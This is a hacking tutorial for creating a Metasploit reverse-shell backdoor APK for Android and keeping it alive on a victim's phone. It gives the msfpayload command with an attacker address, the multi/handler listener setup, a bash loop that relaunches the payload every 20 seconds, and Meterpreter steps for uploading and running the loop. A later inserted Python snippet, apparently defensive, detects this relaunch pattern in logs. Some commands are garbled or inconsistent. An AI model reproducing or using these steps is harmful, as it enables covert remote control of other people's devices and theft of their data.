Create a Persistent Back Door in Android Using Kali Linux Hack any Android



In this tutorial I will show you how to make the backdoor we created in my earlier guide persistent.

I finally found a way to do this. As I was/am very poor at bash scripting, it took me a lot of time (approx. 20 hrs) to get the script working, thanks to the green syntaxes I found on other sites.

Step 1: Fire Up Kali and Hack Android system:

Use this guide to hack an Android app on the LAN.

I will be breaking the WAN, using a VM.

Lets Create a back door by typing:

  • msfpayload android /meterpreter/reverse_tcp LHOST = 182.68.42.6 R> /root/abcde.apk



  • Now, allow to set the listener:
  • msfconsole
  • use exploit /multi/handler
  • set android /meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit



After the user/victim installs and opens abcde.apk, the Meterpreter session comes up ...


Step 2: Create Persistent Script:

Here .. Copy these instructions to the script to build the script, and save it as anything.sh (File extension .sh is important!)


#!/bin/bash

while true

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage / .MainActivity

sleep 20

done


(There is no line difference in the 3rd and 4th lines, they are single line)

(The first line #! /Bin/bash is also important as you see the script as bash Shell text)

(You can set to sleep for any number of seconds you want the script to sleep)



Move / Copy this to the Home/Root folder of kali.


Updated script v3 (Compatible with any version of Android)

IMPORTANT: DO NOT COPY / PASTE THE SCRIPT DIRECTLY, OR  IT DOESN'T WORK /! \

..I think you will have to write it yourself .. (Don't ask me why ..)

Code:

#!/bin/bash

while:

do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

sleep 20

done


There is a 'space' between 'while' and ':'

No Multiple spaces in the script.

NO Line Break between 3rd and 4th lines. (So ​​5 lines in total)

Step 3: Upload it to Android Hacking System:

You need to upload the Shell script to etc/init.d/ to persist or after a restart!

To do this, navigate to the index using the following instructions:

  • cd/

You should now be in the ROOT directory, you can check by typing:

  • ls



Now type:

  • cd etc

Check back by typing:

  • ls



Also change directory:

  • cd init.d
  • ls



Here we are ...

Time to Upload the Shell script

Do this by typing:

  • upload anything.sh



What The **** ? No! We need Root Access to complete this command! Dammm!


Stop:

> Let's just make the application (e.g. Main Activity) persistent until the restart.

> However, it will not persist after the victim's Android device reboots.

> To do this, upload the script anywhere on the sdcard:

  • cd /
  • cd /sdcard/Download
  • ls
  • upload anything.sh



Done! Uploaded!

Step 4: Execute the script:

Now, all we have to do is run the script once, and then everything will be done by the script automatically.

Drop in to the shell of the application by typing:

  • shell

Now, navigate to the location of the Script:

  • cd /
  • cd /sdcard/Download
  • ls

Now is the time for Execution. Type:

  • sh anything.sh



Script activated! All you have to do is press Ctrl+C to stop the shell (don't worry, the script is still running).

Restart to Eliminate the script or use Task Killer
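
Seen from the device side, the loop in anything.sh leaves a regular trace: the same component is started at a fixed interval until the next reboot. The following is an added example (not part of the original tutorial) that scans logcat-style text for that pattern. The log lines are constructed, and the `START ... cmp=` record layout, the `com.example.mail` package and the uid values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed logcat lines (threadtime format). The exact wording of the
# ActivityManager START record varies between Android versions (assumption).
SAMPLE_LOG = """\
03-14 10:00:01.102  1201  1300 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10123
03-14 10:00:09.480  1201  1311 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10021
03-14 10:00:21.140  1201  1300 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10123
03-14 10:00:41.171  1201  1302 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10123
03-14 10:01:01.209  1201  1300 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 10123
03-14 10:03:47.900  1201  1311 I ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.example.mail/.Inbox} from uid 10021
"""

START_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3}).*?START u\d+ \{.*?cmp=([\w.]+/[\w.$]+)"
)

def parse_starts(log):
    """Map each launched component to its start times, in log order."""
    starts = defaultdict(list)
    for line in log.splitlines():
        m = START_RE.search(line)
        if m:
            # logcat omits the year; a fixed leap year is enough for intervals
            ts = datetime.strptime("2000-" + m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            starts[m.group(2)].append(ts)
    return starts

def periodic_relaunches(log, min_starts=4, max_jitter=2.0):
    """Return {component: mean interval in seconds} for timer-like relaunches."""
    findings = {}
    for comp, times in parse_starts(log).items():
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # A person opening an app produces irregular gaps; a sleep loop does not.
        if len(gaps) >= max(1, min_starts - 1) and max(gaps) - min(gaps) <= max_jitter:
            findings[comp] = round(sum(gaps) / len(gaps), 1)
    return findings

if __name__ == "__main__":
    for comp, period in periodic_relaunches(SAMPLE_LOG).items():
        print(f"{comp} relaunched every ~{period}s")
```

A hit on `com.metasploit.stage` is also an indicator on its own, since that is the package name the tutorial's script launches. The interval check still applies when the package has been renamed.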

Step 5: Testing ...

You can check it by exiting the meterpreter and setting the listener.

You should get a meterpreter immediately!

Proof:



WOW! It happened so fast that 3 Sessions opened in a row.

(I know the picture above shows that I am breaking the LAN instead of the WAN as my Public IP is strong and my router has some technical problems, so it keeps updating itself, so I showed the LAN, BUT there are no problems I checked in -WAN, works well)

Conclusion:

Yes! Finally a persistent backdoor is successfully designed for Android applications.


Things to Remember:

  • Background persistence will only remain until the Android system restarts.
  • If you hack over the WAN and have a dynamic public IP, the persistence will only last until your router restarts / your IP changes.
  • Remember to restart the Android device to stop the running script when testing on your own Android system.
  • If the Victim Android system is rooted and your Public IP is Static, then:

1) Persistence will Remain forever on the WAN!

2) Persistence will remain forever on the LAN Obviously

Say goodbye to the Hackers!

Keep Coming for More!

I will be Waiting for Your Comments and Likes

Thank you.
